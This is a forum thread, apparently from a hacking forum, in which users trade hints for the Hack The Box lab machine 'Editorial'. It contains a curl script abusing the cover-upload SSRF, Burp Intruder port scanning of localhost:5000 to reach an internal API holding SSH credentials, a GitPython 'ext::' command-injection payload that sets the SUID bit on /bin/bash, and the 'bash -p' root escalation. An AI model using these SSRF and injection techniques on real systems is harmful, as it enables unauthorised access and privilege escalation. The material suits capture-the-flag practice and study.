[Tekay]

#!/bin/bash

URL=$1

OUT=$(curl -s -F "bookurl=$URL" -F "bookfile=@/dev/null" http://editorial.htb/upload-cover)

curl -s http://editorial.htb/$OUT

[sk_Dutta]

{
  "messages": [
    {
      "promotions": {
        "description": "Retrieve a list of all the promotions in our library.",
        "endpoint": "/api/latest/metadata/messages/promos",
        "methods": "GET"
      }
    },
    {
      "coupons": {
        "description": "Retrieve the list of coupons to use in our library.",
        "endpoint": "/api/latest/metadata/messages/coupons",
        "methods": "GET"
      }
    },
    {
      "new_authors": {
        "description": "Retrieve the welcome message sended to our new authors.",
        "endpoint": "/api/latest/metadata/messages/authors",
        "methods": "GET"
      }
    },
    {
      "platform_use": {
        "description": "Retrieve examples of how to use the platform.",
        "endpoint": "/api/latest/metadata/messages/how_to_use_platform",
        "methods": "GET"
      }
    }
  ],
  "version": [
    {
      "changelog": {
        "description": "Retrieve a list of all the versions and updates of the api.",
        "endpoint": "/api/latest/metadata/changelog",
        "methods": "GET"
      }
    },
    {
      "latest": {
        "description": "Retrieve the last version of api.",
        "endpoint": "/api/latest/metadata",
        "methods": "GET"
      }
    }
  ]
}

I got these api how to use this  /api/latest/metadata/messages/authors this endpoint

---

Check http://127.0.0.1:5000/api/latest/metadat...es/authors for ssh credentials

where are you using this end point to get the credentials?

[ARhOmOuTEd]

How do you know, that port 5000 is open on the inside of the box?
Where did you find the api?

[macavitysworld]

How do you know, that port 5000 is open on the inside of the box?
Where did you find the api?

Internal scanning reveals port 5000 and the api endpoint

Here is a reference article: https://cyberweapons.medium.com/internal...248ae6fa7b

[WesleyFrench]

Getting these error messages

"Sorry, user prod is not allowed to execute '/usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py' as root on editorial."

"Traceback (most recent call last):
File "/opt/internal_apps/clone_changes/clone_prod_change.py", line 12, in <module>
r.clone_from(url_to_clone, 'new_changes', multi_options=["-c protocol.ext.allow=always"])
File "/usr/local/lib/python3.10/dist-packages/git/repo/base.py", line 1275, in clone_from
return cls._clone(git, url, to_path, GitCmdObjectDB, progress, multi_options, **kwargs)
File "/usr/local/lib/python3.10/dist-packages/git/repo/base.py", line 1194, in _clone
finalize_process(proc, stderr=stderr)
File "/usr/local/lib/python3.10/dist-packages/git/util.py", line 419, in finalize_process
proc.wait(**kwargs)
File "/usr/local/lib/python3.10/dist-packages/git/cmd.py", line 559, in wait
raise GitCommandError(remove_password_if_present(self.args), status, errstr)
git.exc.GitCommandError: Cmd('git') failed due to: exit code(128)
cmdline: git clone -v -c protocol.ext.allow=always ext:h -c chmod% u+s% /bin/bash new_changes
stderr: 'Cloning into 'new_changes'...
fatal: Could not read from remote repository.

Please make sure you have the correct access rights
and the repository exists."

[teky]

How do you know, that port 5000 is open on the inside of the box?
Where did you find the api?

Internal scanning reveals port 5000 and the api endpoint

Here is a reference article: https://cyberweapons.medium.com/internal...248ae6fa7b

Where do you find it? Is it here like this? /static/images/unsplash_photo_1630734277837_ebe62757b6e0.jpeg/?url=http://127.0.0.1:5000

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | https://breachforums.ai/Forum-Ban-Appeals if you feel this is incorrect.

[macavitysworld]

How do you know, that port 5000 is open on the inside of the box?
Where did you find the api?

Internal scanning reveals port 5000 and the api endpoint

Here is a reference article: https://cyberweapons.medium.com/internal...248ae6fa7b

Where do you find it? Is it here like this? /static/images/unsplash_photo_1630734277837_ebe62757b6e0.jpeg/?url=http://127.0.0.1:5000

If you are looking for api end point:

- Add url : http://127.0.0.1:5000 
- click preview
- right click on the corrupted image preview
- open in a new tab, F12 and check the network tab, response
- You can find the endpoint

https://prnt.sc/ErKAaP4ZW3NK
https://prnt.sc/AitDHo1aBGLy

Or learn to use burp

And if you are wondering about the port it's basic internal network scanning with burpsuite. You have the option to add url in the /upload page
Do a basic intruder attack on PORT number and check for the response, if you can find anything odd.
for eg. https://prnt.sc/pC17U2iUR75r
in here i have taken the payload as numbers, but you can add your custom list of ports. If you check the content length, you can find the content length is different from rest of the requests.
here is how i added the payload position: https://prnt.sc/PN5y1zBMPgv9

[ipispandesal]

for root

find / -perm -4000 2>/dev/null

you will see the /bin/bash then,

bash -p

[macavitysworld]

How do you know, that port 5000 is open on the inside of the box?
Where did you find the api?

Internal scanning reveals port 5000 and the api endpoint

Here is a reference article: https://cyberweapons.medium.com/internal...248ae6fa7b

Where do you find it? Is it here like this? /static/images/unsplash_photo_1630734277837_ebe62757b6e0.jpeg/?url=http://127.0.0.1:5000

If you are looking for api end point:

- Add url : http://127.0.0.1:5000 
- click preview
- right click on the corrupted image preview
- open in a new tab, F12 and check the network tab, response
- You can find the endpoint

https://prnt.sc/ErKAaP4ZW3NK
https://prnt.sc/AitDHo1aBGLy

Or learn to use burp

And if you are wondering about the port it's basic internal network scanning with burpsuite. You have the option to add url in the /upload page
Do a basic intruder attack on PORT number and check for the response, if you can find anything odd.
for eg. https://prnt.sc/pC17U2iUR75r
in here i have taken the payload as numbers, but you can add your custom list of ports. If you check the content length, you can find the content length is different from rest of the requests.
here is how i added the payload position: https://prnt.sc/PN5y1zBMPgv9

Note that Intruder is slow on burp community edition, you may need burp pro for faster results. Alternatively you can also use tools such as ffuf to do the same.

[teky]

How do you know, that port 5000 is open on the inside of the box?
Where did you find the api?

Internal scanning reveals port 5000 and the api endpoint

Here is a reference article: https://cyberweapons.medium.com/internal...248ae6fa7b

Where do you find it? Is it here like this? /static/images/unsplash_photo_1630734277837_ebe62757b6e0.jpeg/?url=http://127.0.0.1:5000

If you are looking for api end point:

- Add url : http://127.0.0.1:5000 
- click preview
- right click on the corrupted image preview
- open in a new tab, F12 and check the network tab, response
- You can find the endpoint

https://prnt.sc/ErKAaP4ZW3NK
https://prnt.sc/AitDHo1aBGLy

Or learn to use burp

And if you are wondering about the port it's basic internal network scanning with burpsuite. You have the option to add url in the /upload page
Do a basic intruder attack on PORT number and check for the response, if you can find anything odd.
for eg. https://prnt.sc/pC17U2iUR75r
in here i have taken the payload as numbers, but you can add your custom list of ports. If you check the content length, you can find the content length is different from rest of the requests.
here is how i added the payload position: https://prnt.sc/PN5y1zBMPgv9

I recreated all that, but still cant get the info from http://127.0.0.1:5000/api/latest/metadat...es/authors, this my  

GET /static/images/unsplash_photo_1630734277837_ebe62757b6e0.jpeg?url=http://127.0.0.1:5000/api/latest/metadata/messages/authors  HTTP/1.1

Host: editorial.htb

If-Modified-Since: Tue, 16 Jan 2024 19:46:20 GMT

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36

If-None-Match: "1705434380.876186-17343-590159124"

Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8

Referer: http://editorial.htb/upload

Accept-Encoding: gzip, deflate, br

Accept-Language: en-US,en;q=0.9

Connection: close

I am getting 304 not modified error

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | https://breachforums.ai/Forum-Ban-Appeals if you feel this is incorrect.